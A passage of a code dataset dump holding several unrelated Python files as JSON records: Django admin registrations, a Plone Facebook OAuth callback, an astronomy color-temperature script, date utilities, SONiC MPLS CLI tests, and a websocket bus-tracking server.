"call"}, {"api_name": "django.conf.urls.include", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 25, "usage_type": "call"}]} {"seq_id": "552792675", "text": "from django.contrib import admin\nfrom tpo.app.models import UserProfile, Company\n\n\nclass UserProfileAdmin(admin.ModelAdmin):\n fields = ('name', 'username', 'email',)\n\n\nclass CompanyAdmin(admin.ModelAdmin):\n search_fields = ('name', 'tpr__name', 'tpr__email', 'tpr__username')\n list_display = ('name', 'tpr',)\n list_filter = ('type_of_company',)\n\n\nadmin.site.register(UserProfile, UserProfileAdmin)\nadmin.site.register(Company, CompanyAdmin)\n", "sub_path": "tpo/app/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 453, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 15, "usage_type": "call"}, {"api_name": "tpo.app.models.UserProfile", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 16, "usage_type": "call"}, {"api_name": "tpo.app.models.Company", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 16, "usage_type": "name"}]} {"seq_id": "99246420", "text": "# coding: utf-8\n\nimport urllib2\nimport urllib\nimport urlparse\nfrom zope.component import getUtility\nfrom plone.registry.interfaces import IRegistry\nfrom collective.socialpublish.controlpanel.interfaces import ISocialPublishControlPanel\nfrom Products.Five.browser import BrowserView\n#from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.statusmessages.interfaces import IStatusMessage\n\nfrom collective.socialpublish.events import get_page_list\nfrom collective.socialpublish.controlpanel.utils import fb_page_info_list_to_str\n\nENDPOINT = 'graph.facebook.com'\n\ndef get_url(path, args=None):\n args = args or {}\n #if ACCESS_TOKEN:\n # args['access_token'] = ACCESS_TOKEN\n if 'access_token' in args or 'client_secret' in args:\n endpoint = \"https://\" + ENDPOINT\n else:\n endpoint = \"http://\" + ENDPOINT\n return endpoint + path + '?' + urllib.urlencode(args)\n\ndef get_resource(path, args=None):\n return urllib2.urlopen(get_url(path, args=args)).read()\n\n\nclass FacebookAuth(BrowserView):\n \"\"\"\n\n \"\"\"\n #template = ViewPageTemplateFile('')\n\n def __call__(self):\n portal_messages = IStatusMessage(self.request)\n portal_url = getToolByName(self.context, 'portal_url')()\n here_url = portal_url + \"/@@facebook-auth\"\n registry = getUtility(IRegistry)\n settings = registry.forInterface(ISocialPublishControlPanel)\n fb_app_id = settings.fb_app_id\n fb_app_secret = settings.fb_app_secret\n\n code = self.request.form.get('code')\n if code is None:\n portal_messages.add(u\"Illegal access because nothing 'code'\", type=u\"error\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n token_res = get_resource('/oauth/access_token', {'client_id': fb_app_id,\n 'redirect_uri': here_url,\n 'client_secret': fb_app_secret,\n 'code': code})\n fb_access_token = urlparse.parse_qs(token_res).get('access_token')\n try:\n fb_access_token_unicode = unicode(fb_access_token[0], 'utf-8')\n except IndexError:\n portal_messages.add(u\"Couldn't get Facebook token\", type=u\"error\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n settings.fb_access_token = fb_access_token_unicode\n\n page_info_list = get_page_list(fb_access_token_unicode)\n settings.fb_page_info = fb_page_info_list_to_str(page_info_list)\n\n portal_messages.add(u\"Getting Facebook page information\", type=u\"info\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n\n", "sub_path": "collective/socialpublish/facebook_auth/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 2780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "urllib.urlencode", "line_number": 27, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 30, "usage_type": "call"}, {"api_name": "Products.Five.browser.BrowserView", "line_number": 33, "usage_type": "name"}, {"api_name": "Products.statusmessages.interfaces.IStatusMessage", "line_number": 40, "usage_type": "call"}, {"api_name": "Products.CMFCore.utils.getToolByName", "line_number": 41, "usage_type": "call"}, {"api_name": "zope.component.getUtility", "line_number": 43, "usage_type": "call"}, {"api_name": "plone.registry.interfaces.IRegistry", "line_number": 43, "usage_type": "argument"}, {"api_name": "collective.socialpublish.controlpanel.interfaces.ISocialPublishControlPanel", "line_number": 44, "usage_type": "argument"}, {"api_name": "urlparse.parse_qs", "line_number": 56, "usage_type": "call"}, {"api_name": "collective.socialpublish.events.get_page_list", "line_number": 64, "usage_type": "call"}, {"api_name": "collective.socialpublish.controlpanel.utils.fb_page_info_list_to_str", "line_number": 65, "usage_type": "call"}]} {"seq_id": "291641998", "text": "import pyfits\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import fsolve\nfrom astropy.io import fits\n\ndata1 = pyfits.getdata('4imAF.fits') \ndata2 = pyfits.getdata('3imAF.fits')\n\n#set a noise floor for the image. Poor SNR pixels will give you bad temperature measurements.\nfloor1 = 0.045\nfloor2 = 0.070\n\n\n#set low SNR pixels to nans\nav1 = np.where(data1 < floor1)\ndata1[av1] = np.nan\n\n#set low SNR pixels to nans\nav2 = np.where(data2 < floor2)\ndata2[av2] = np.nan\n\n#Color temperatures\n\n#extinction factor for the images (provided by Matt)\nbg1 = 2.58\nbg2 = 1.54\n\n#Bg from Fit3.py code, aka. fitting the histogram\n #I_1Bg = Band 3 background Intensity\n #I_2Bg = Band 4 background Intensity\nI_1Bg = 325\nI_2Bg = 1261\n\n#wavelengths of first image in cm for cgs\nl1 = 12e-4\nl2 = 22e-4\n\n#set constants (in cgs)\nc = 3e10\nh = 6.626e-27\nc = 2.9979e10\nkb = 1.38e-16\n\n#convert wavelengths of images to frequencies\nv1 = c / l1\nv2 = c / l2\n\n#define function for b_nu that we will solve for T\nfunc = lambda T : (v1/v2)**5*(np.expm1((h*v2)/(kb*T)))/(np.expm1((h*v1)/(kb*T)))-I_1/I_2\n\n#provide an initial guess for T for the solver to use. \nTinit = 100.0\n\n#get the shape of the images so we know how big to make the for loop\nshp = np.shape(data1)\n\n#create a new empty array to store the temperature values\nTim = np.zeros((shp[0],shp[1]))\n\nfor i in range (0,shp[0]):\n for j in range (0,shp[1]):\n\n #store the pixel values from the images\n I_1 = data1[i,j]\n I_2 = data2[i,j]\n \n #apply the extinction factors\n I_1 = I_1*bg1\n I_2 = I_2*bg2\n \n #use the solver to find the temperatures\n TS = fsolve(func,Tinit)\n \n #store the values in the array\n Tim[i,j] = TS\n\n#Where the solver returned Tinit, turn into a nan. \nTim[Tim == Tinit] = np.nan\n\n#Creating a new array\nhdu = fits.PrimaryHDU(Tim)\nhdulist = fits.HDUList([hdu])\nhdulist.writeto('1_ColorTempAF_5.fits')\n\n#plot the color temperature map\nplt.figure()\nplt.title('Color-Tempature Map')\nplt.imshow(Tim[::-1])\n#plt.clim(lowval, highval)\nplt.colorbar()\nplt.show()\n\n\n\n#fits.writeto('out.fits', data, header)\n", "sub_path": "Code3.py", "file_name": "Code3.py", "file_ext": "py", "file_size_in_byte": 2158, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pyfits.getdata", "line_number": 7, "usage_type": "call"}, {"api_name": "pyfits.getdata", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.expm1", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.optimize.fsolve", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 79, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.PrimaryHDU", "line_number": 82, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 82, "usage_type": "name"}, {"api_name": "astropy.io.fits.HDUList", "line_number": 83, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}]} {"seq_id": "281666533", "text": "# def bubble_sort(l):\n# length = len(l)\n# for i in range(length):\n# try:\n# for j in range(length-i):\n# if l[j] > l[j+1]:\n# tmp = l[j+1]\n# l[j+1] = l[j]\n# l[j] = tmp\n# except IndexError:\n# pass\n#\n# return l\n\n#变量其实是地址 # 101011100111101011 #逻辑地址 -->物理地址 01111110001100\nimport datetime\n\ndef get_time():\n return datetime.time()\n\ndef f2():\n now = get_time()\n\ndef select_sort(l):\n\n now = get_time()\n\n length = len(l)\n for i in range(length):\n little = l[i]\n min_index = i+1\n for j in range(i+1,length):\n if l[j] < l[min_index]:\n min_index = j\n try:\n if l[min_index] < little:\n tmp = little\n l[i] = l[min_index]\n l[min_index] = tmp\n except IndexError:\n pass\n\n return l\n\n\n\n\n\n\n\na1 = [1,2,10,3,4,5,9,56,6,7,134,9]\n\n# print(select_sort(a1))\n\n\ndef muti_seli():\n sql = 'select 1;'\n sql2 = 'select 2;'\n\n\nx = None\nx12 = 'None'\n\n\nstr1 = \"\\\\r\"\n\nprint(str1)\n\nprint('-------')", "sub_path": "rimi_linux_mysql/speach/bubble.py", "file_name": "bubble.py", "file_ext": "py", "file_size_in_byte": 1167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "datetime.time", "line_number": 19, "usage_type": "call"}]} {"seq_id": "75872116", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/breno/Envs/djangoplus/lib/python3.7/site-packages/djangoplus/utils/dateutils.py\n# Compiled at: 2019-04-13 18:22:56\n# Size of source mod 2**32: 2346 bytes\nimport datetime, calendar\nDAY_NAMES = [calendar.day_name[i].capitalize().split()[0] for i in range(0, 7)]\nDAY_INITIALS = [calendar.day_name[i][0:3].capitalize() for i in range(0, 7)]\nMONTH_NAMES = [calendar.month_name[i].capitalize() for i in range(1, 13)]\nMONTH_INITIALS = [calendar.month_name[i][0:3].capitalize() for i in range(1, 13)]\nDAY_NAMES_CHOICES = [[x, x] for x in DAY_NAMES]\nDAY_INITIALS_CHOICES = [[x, x] for x in DAY_INITIALS]\nMONTH_NAMES_CHOICES = [[x, x] for x in MONTH_NAMES]\nMONTH_INITIALS_CHOICES = [[x, x] for x in MONTH_INITIALS]\n\ndef calculate_age(birthday):\n today = datetime.date.today()\n return today.year - birthday.year - ((today.month, today.day) < (birthday.month, birthday.day))\n\n\ndef numer_of_days(start, end):\n delta = end - start\n return delta.days\n\n\ndef parse_date(date_string):\n if len(date_string) == 10:\n fmt = '%d/%m/%Y'\n else:\n fmt = '%d/%m/%Y %H:%M:%S'\n return datetime.datetime.strptime(date_string, fmt)\n\n\ndef add_months(sourcedate, months):\n month = sourcedate.month - 1 + months\n year = int(sourcedate.year + month / 12)\n month = month % 12 + 1\n day = min(sourcedate.day, calendar.monthrange(year, month)[1])\n return datetime.date(year, month, day)\n\n\ndef add_days(sourcedate, days):\n sourcedate = sourcedate or datetime.date.today()\n return sourcedate + datetime.timedelta(days=days)\n\n\ndef future(days):\n return datetime.date.today() + datetime.timedelta(days=days)\n\n\ndef past(days):\n return datetime.date.today() - datetime.timedelta(days=days)\n\n\ndef pretty_date(d):\n diff = datetime.datetime.now() - d\n s = diff.seconds\n if diff.days > 365 or diff.days < 0:\n return d.strftime('%d %b %y')\n if 60 > diff.days > 30:\n return '1 mês atrás'\n if diff.days > 60:\n return '{} meses atrás'.format(diff.days / 30)\n if diff.days == 1:\n return '1 dia atrás'\n if diff.days > 1:\n return '{} dias atrás'.format(diff.days)\n if s <= 1:\n return 'agora'\n if s < 60:\n return '{} segundos atrás'.format(s)\n if s < 120:\n return '1 minuto atrás'\n if s < 3600:\n return '{} minutos atrás'.format(s / 60)\n if s < 7200:\n return '1 hora atrás'\n return '{} horas atrás'.format(s / 3600)", "sub_path": "pycfiles/djangoplus-0.0.98.tar/dateutils.cpython-37.py", "file_name": "dateutils.cpython-37.py", "file_ext": "py", "file_size_in_byte": 2603, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "calendar.day_name", "line_number": 9, "usage_type": "attribute"}, {"api_name": "calendar.day_name", "line_number": 10, "usage_type": "attribute"}, {"api_name": "calendar.month_name", "line_number": 11, "usage_type": "attribute"}, {"api_name": "calendar.month_name", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "calendar.monthrange", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 45, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 54, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "attribute"}]} {"seq_id": "461565645", "text": "import os\nimport sys\nimport traceback\nfrom unittest import mock\n\nfrom click.testing import CliRunner\n\nfrom .mock_tables import dbconnector\n\nimport config.main as config\nimport show.main as show\nfrom utilities_common.db import Db\n\nshow_interfaces_mpls_output=\"\"\"\\\nInterface MPLS State\n------------ ------------\nEthernet2 enable\nEthernet4 disable\nEthernet8 disable\nEthernet16 disable\nLoopback0 disable\nPortChannel2 disable\nVlan2 enable\n\"\"\"\n\nshow_interfaces_mpls_specific_output=\"\"\"\\\nInterface MPLS State\n----------- ------------\nEthernet2 enable\n\"\"\"\n\nmodules_path = os.path.join(os.path.dirname(__file__), \"..\")\ntest_path = os.path.join(modules_path, \"tests\")\nsys.path.insert(0, modules_path)\nsys.path.insert(0, test_path)\nmock_db_path = os.path.join(test_path, \"mpls_input\")\n\n\nclass TestMpls(object):\n @classmethod\n def setup_class(cls):\n print(\"SETUP\")\n os.environ['UTILITIES_UNIT_TESTING'] = \"1\"\n\n def test_config_mpls_add(self):\n runner = CliRunner()\n db = Db()\n obj = {'config_db':db.cfgdb}\n\n result = runner.invoke(config.config.commands[\"interface\"].commands[\"mpls\"].commands[\"add\"], [\"Ethernet4\"], obj=obj)\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert db.cfgdb.get_entry(\"INTERFACE\", \"Ethernet4\") == {\"mpls\": \"enable\"}\n\n def test_config_mpls_remove(self):\n runner = CliRunner()\n db = Db()\n obj = {'config_db':db.cfgdb}\n\n result = runner.invoke(config.config.commands[\"interface\"].commands[\"mpls\"].commands[\"remove\"], [\"Ethernet4\"], obj=obj)\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert db.cfgdb.get_entry(\"INTERFACE\", \"Ethernet4\") == {\"mpls\": \"disable\"}\n\n def test_show_interfaces_mpls(self):\n jsonfile = os.path.join(mock_db_path, 'appl_db')\n dbconnector.dedicated_dbs['APPL_DB'] = jsonfile\n\n runner = CliRunner()\n result = runner.invoke(show.cli.commands[\"interfaces\"].commands[\"mpls\"], [])\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert result.output == show_interfaces_mpls_output\n\n def test_show_interfaces_mpls_specific(self):\n jsonfile = os.path.join(mock_db_path, 'appl_db')\n dbconnector.dedicated_dbs['APPL_DB'] = jsonfile\n\n runner = CliRunner()\n result = runner.invoke(show.cli.commands[\"interfaces\"].commands[\"mpls\"], [\"Ethernet2\"])\n print(result.exit_code)\n print(result.output)\n assert result.exit_code == 0\n assert result.output == show_interfaces_mpls_specific_output\n\n @classmethod\n def teardown_class(cls):\n print(\"TEARDOWN\")\n os.environ['UTILITIES_UNIT_TESTING'] = \"0\"\n dbconnector.dedicated_dbs['APPL_DB'] = None\n", "sub_path": "tests/mpls_test.py", "file_name": "mpls_test.py", "file_ext": "py", "file_size_in_byte": 2879, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "click.testing.CliRunner", "line_number": 46, "usage_type": "call"}, {"api_name": "utilities_common.db.Db", "line_number": 47, "usage_type": "call"}, {"api_name": "config.main.config", "line_number": 50, "usage_type": "attribute"}, {"api_name": "config.main", "line_number": 50, "usage_type": "name"}, {"api_name": "click.testing.CliRunner", "line_number": 57, "usage_type": "call"}, {"api_name": "utilities_common.db.Db", "line_number": 58, "usage_type": "call"}, {"api_name": "config.main.config", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.main", "line_number": 61, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector.dedicated_dbs", "line_number": 69, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector", "line_number": 69, "usage_type": "name"}, {"api_name": "click.testing.CliRunner", "line_number": 71, "usage_type": "call"}, {"api_name": "show.main.cli", "line_number": 72, "usage_type": "attribute"}, {"api_name": "show.main", "line_number": 72, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector.dedicated_dbs", "line_number": 80, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector", "line_number": 80, "usage_type": "name"}, {"api_name": "click.testing.CliRunner", "line_number": 82, "usage_type": "call"}, {"api_name": "show.main.cli", "line_number": 83, "usage_type": "attribute"}, {"api_name": "show.main", "line_number": 83, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 92, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector.dedicated_dbs", "line_number": 93, "usage_type": "attribute"}, {"api_name": "mock_tables.dbconnector", "line_number": 93, "usage_type": "name"}]} {"seq_id": "331995994", "text": "\"\"\"\n下载\n\"\"\"\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\n\nfrom urllib.request import urlopen\n\nimport json\nimport requests\n\njson_url = \"https://raw.githubusercontent.com/muxuezi/btc/master/btc_close_2017.json\"\nresponse = urlopen(json_url)\n\n# 读取数据\nreq = response.read()\n# print(type(req))\n# print(req)\n# 将数据写入文件\nwith open(\"btc_close_2017_down.json\", 'wb') as f:\n f.write(req)\n\n# 加载json格式\n# with open(\"btc_close_2017_down.json\", 'r') as f:\n# file_urllib = json.load(f)\n# print(file_urllib)\nfile_urllib = json.loads(str(req, 'utf-8'))\nprint(file_urllib)\n\n# 使用requests\n\nreq = requests.get(json_url)\nwith open('btc_close_2017_down_requests.json', 'w') as f:\n f.write(req.text)\n\nprint(req.json())\n\n", "sub_path": "PythonCrashCourse/chapter16/btc_close_2017.py", "file_name": "btc_close_2017.py", "file_ext": "py", "file_size_in_byte": 806, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "urllib.request.urlopen", "line_number": 13, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}]} {"seq_id": "605007916", "text": "import json\nimport logging\nfrom dataclasses import asdict\nfrom json.decoder import JSONDecodeError\n\nimport asyncclick as click\nimport trio\nfrom trio_websocket import ConnectionClosed, serve_websocket\n\nfrom utils import Bus, Frame, WindowBounds\nfrom validators import get_validated_bus_data, get_validated_map_frame\n\nBUSES = {}\n\n\nasync def start_bus_data_share(request):\n \"\"\"\n Accepts: json with \"busId\",\"lat\",\"lng\",\"route\"\n \"\"\"\n ws = await request.accept()\n while True:\n try:\n bus_json = await ws.get_message()\n bus_dict = get_validated_bus_data(bus_json)\n if bus_dict is None:\n continue\n else:\n await ws.send_message(\"ok\")\n bus_id = bus_dict[\"busId\"]\n BUSES[bus_id] = Bus(**bus_dict)\n logging.info(f\"got {bus_id}\")\n except ValueError as e:\n logging.info(f\"bus = {e}\")\n await ws.send_message(\n json.dumps({\"bus_error\": str(e), \"msgType\": \"Error\"})\n )\n except JSONDecodeError:\n logging.info(\"Invalid JSON Data\")\n await ws.send_message(\n '{\"bus_error\": \"Invalid JSON Data\", \"msgType\": \"Error\"}'\n )\n\n\nasync def start_browser_data_share(request):\n \"\"\"\n Sends: buses json\n Receives: Browser Frame with coordinatess\n \"\"\"\n frame = Frame()\n ws = await request.accept()\n async with trio.open_nursery() as nursery:\n nursery.start_soon(get_map_frame, ws, frame)\n nursery.start_soon(send_buses_data, ws, frame)\n\n\nasync def send_buses_data(ws, frame: Frame):\n while True:\n logging.info(\"got browser request\")\n if frame.get_bounds() is not None:\n filtered_buses = filter(frame.is_inside, BUSES.values())\n\n await ws.send_message(\n json.dumps(\n {\n \"msgType\": \"Buses\",\n \"buses\": [asdict(bus) for bus in filtered_buses],\n }\n )\n )\n else:\n logging.info(\"frame is empty\")\n await trio.sleep(2.5)\n\n\nasync def get_map_frame(ws, frame: Frame):\n while True:\n try:\n frame_json = await ws.get_message()\n logging.info(\"got frame from browser\")\n frame_dict = get_validated_map_frame(frame_json)\n if frame_dict is None or (not \"data\" in frame_dict):\n continue\n frame.update(WindowBounds(**frame_dict[\"data\"]))\n except ValueError as e:\n logging.info(f\"map = {e}\")\n await ws.send_message(\n json.dumps({\"frame_error\": str(e), \"msgType\": \"Error\"})\n )\n except JSONDecodeError:\n logging.info(\"Invalid JSON Data\")\n await ws.send_message(\n '{\"frame_error\": \"Invalid JSON Data\", \"msgType\": \"Error\"}'\n )\n\n\nasync def bus_connection(port):\n while True:\n try:\n async with trio.open_nursery() as nursery:\n nursery.start_soon(\n serve_websocket,\n start_bus_data_share,\n \"127.0.0.1\",\n port,\n None,\n )\n except ConnectionClosed:\n logging.info(\"sensors connection problem\")\n\n\nasync def browser_connection(port):\n while True:\n try:\n async with trio.open_nursery() as nursery:\n nursery.start_soon(\n serve_websocket,\n start_browser_data_share,\n \"127.0.0.1\",\n port,\n None,\n )\n except ConnectionClosed:\n logging.info(\"closed browser\")\n\n\nasync def main(bus_port: int, browser_port: int, v: bool):\n if v:\n logging.basicConfig(level=logging.INFO)\n else:\n logging.basicConfig(level=logging.ERROR)\n\n async with trio.open_nursery() as nursery:\n nursery.start_soon(bus_connection, bus_port)\n nursery.start_soon(browser_connection, browser_port)\n\n\n@click.command()\n@click.option(\"--bus_port\", default=8080, help=\"порт для имитатора автобусов\")\n@click.option(\"--browser_port\", default=8000, help=\" порт для браузера\")\n@click.option(\"--v\", default=False, help=\"настройка логирования\")\ndef run(bus_port: int, browser_port: int, v: bool):\n trio.run(main, bus_port, browser_port, v)\n\n\nif __name__ == \"__main__\":\n run()\n", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "validators.get_validated_bus_data", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.Bus", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 33, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 35, "usage_type": "call"}, {"api_name": "json.decoder.JSONDecodeError", "line_number": 37, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.Frame", "line_number": 49, "usage_type": "call"}, {"api_name": "trio.open_nursery", "line_number": 51, "usage_type": "call"}, {"api_name": "utils.Frame", "line_number": 56, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 63, "usage_type": "call"}, {"api_name": "dataclasses.asdict", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}, {"api_name": "trio.sleep", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.Frame", "line_number": 75, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 79, "usage_type": "call"}, {"api_name": "validators.get_validated_map_frame", "line_number": 80, "usage_type": "call"}, {"api_name": "utils.WindowBounds", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 85, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 87, "usage_type": "call"}, {"api_name": "json.decoder.JSONDecodeError", "line_number": 89, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 90, "usage_type": "call"}, {"api_name": "trio.open_nursery", "line_number": 99, "usage_type": "call"}, {"api_name": "trio_websocket.serve_websocket", "line_number": 101, "usage_type": "argument"}, {"api_name": "trio_websocket.ConnectionClosed", "line_number": 107, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 108, "usage_type": "call"}, {"api_name": "trio.open_nursery", "line_number": 114, "usage_type": "call"}, {"api_name": "trio_websocket.serve_websocket", "line_number": 116, "usage_type": "argument"}, {"api_name": "trio_websocket.ConnectionClosed", "line_number": 122, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 123, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 128, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 130, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 130, "usage_type": "attribute"}, {"api_name": "trio.open_nursery", "line_number": 132, "usage_type": "call"}, {"api_name": "trio.run", "line_number": 142, "usage_type": "call"}, {"api_name": "asyncclick.command", "line_number": 137, "usage_type": "call"}, {"api_name": "asyncclick.option", "line_number": 138, "usage_type": "call"}, {"api_name": "asyncclick.option", "line_number": 139, "usage_type": "call"}, {"api_name": "asyncclick.option", "line_number": 140, "usage_type": "call"}]} {"seq_id": "301842047", "text": "\"\"\" The entry point of configure and launch experiment.\n\"\"\"\nfrom exptools.launching.variant import VariantLevel, make_variants, update_config\nfrom exptools.launching.affinity import encode_affinity, quick_affinity_code\nfrom exptools.launching.exp_launcher import run_experiments\n\nfrom os import path\n\nfrom vos.experiments.launch_pretrain_vos import get_default_config\n\ndef main(args):\n experiment_title = \"video_segmentation\"\n affinity_code = encode_affinity(\n n_cpu_core= 48,\n n_gpu= 4,\n gpu_per_run= 4,\n )\n default_config = get_default_config()\n default_config[\"runner_kwargs\"][\"pretrain_optim_epochs\"] = 0\n\n # set up variants\n variant_levels = list()\n\n values = [\n # [\"EMN\", ],\n [\"STM\", ],\n ]\n dir_names = [\"NN{}\".format(*v) for v in values]\n 